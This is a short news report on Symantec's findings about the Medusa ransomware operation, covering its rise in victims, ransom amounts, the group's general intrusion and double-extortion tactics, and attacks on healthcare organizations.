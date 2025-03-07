The cybersecurity firm believes the true number of victims is likely much higher. The findings do not account for victims who paid a ransom to stop the stolen information being published.

In total, Medusa has listed almost 400 victims on its data leaks site since first becoming active in early 2023.

This is almost twice the number of Medusa attacks observed in January and February 2024, according to new analysis by Symantec’s threat hunting team.

Medusa ransomware has claimed over 40 victims in the first two months of 2025, including a confirmed attack on a US healthcare organization.

Ransoms demanded by attackers using the Medusa ransomware have ranged from $100,000 up to $15m.

Medusa’s claimed victims has increased in the past 12 months. The ransomware operators have likely taken advantage of the decline of big name ransomware-as-a-service (RaaS) groups such as BlackCat and LockBit following law enforcement action in 2023 and 2024.

Medusa is believed to be operated as RaaS by a group Symantec tracks as Spearwing.

The current Medusa ransomware is different to the older MedusaLocker variant, which Spearwing is not believed to have any link to.

How Medusa Attackers Operate

Medusa uses double-extortion tactics, stealing victims’ data before encrypting networks in order to increase the pressure on victims to pay a ransom.

The researchers believe that Spearwing and its affiliates usually gain initial access by exploiting unpatched vulnerabilities in public-facing applications, particularly Microsoft Exchange Servers.

They then deploy a variety of living-off-the-land and legitimate tools to evade detection, achieve lateral movement and exfiltrate data before encrypting systems.

These include:

Remote management and monitoring (RMM) software such as SimpleHelp or AnyDesk to download drivers

The RMM PDQ Deploy to drop other tools and move laterally across the victim network

Use of the Bring Your Own Vulnerable Driver (BYOVD) technique, in which attackers deploy a signed vulnerable driver to the target network, which they then exploit to disable security software and evade detection

Tools used to search for and copy relevant data for exfiltration, such as Navicat and RoboCopy

Once the ransomware is executed, the .medusa extension is added to encrypted files and a ransom note named !READ_ME_MEDUSA!!!.txt is dropped on encrypted machines.

The ransom amount demanded varies depending on the victims, who are given 10 days to pay and are charged $10,000 per day if they want to extend this deadline.

Medusa can also delete itself from victim machines once the ransom is executed, making it harder for investigators to determine the source of the attack.

The Symantec researchers said the Medusa TTPs have remained consistent since early 2023. This suggests that Spearwing works with a small number of affiliates and provides them with a playbook as to how the attacks should be carried out and the attack chain to use.

Medusa Ransomware Attacks on Healthcare

Symantec highlighted a Medusa attack on an unnamed US healthcare organization in January 2025, which infected hundreds of machines.

The attacker activity first occurred on the network four days before the ransomware was deployed, highlighting the trend of increased dwell time in victim networks to identify data of value to exfiltrate.

The researchers found indications of “hands-on-keyboard activity” rather than it being an automated attack.

In a new analysis, consumer website Comparitech reported seven of the 959 confirmed ransomware attacks in February impacted healthcare.

Comparitech found that Medusa was responsible for three of the seven healthcare attacks, two in the US and one in the UK.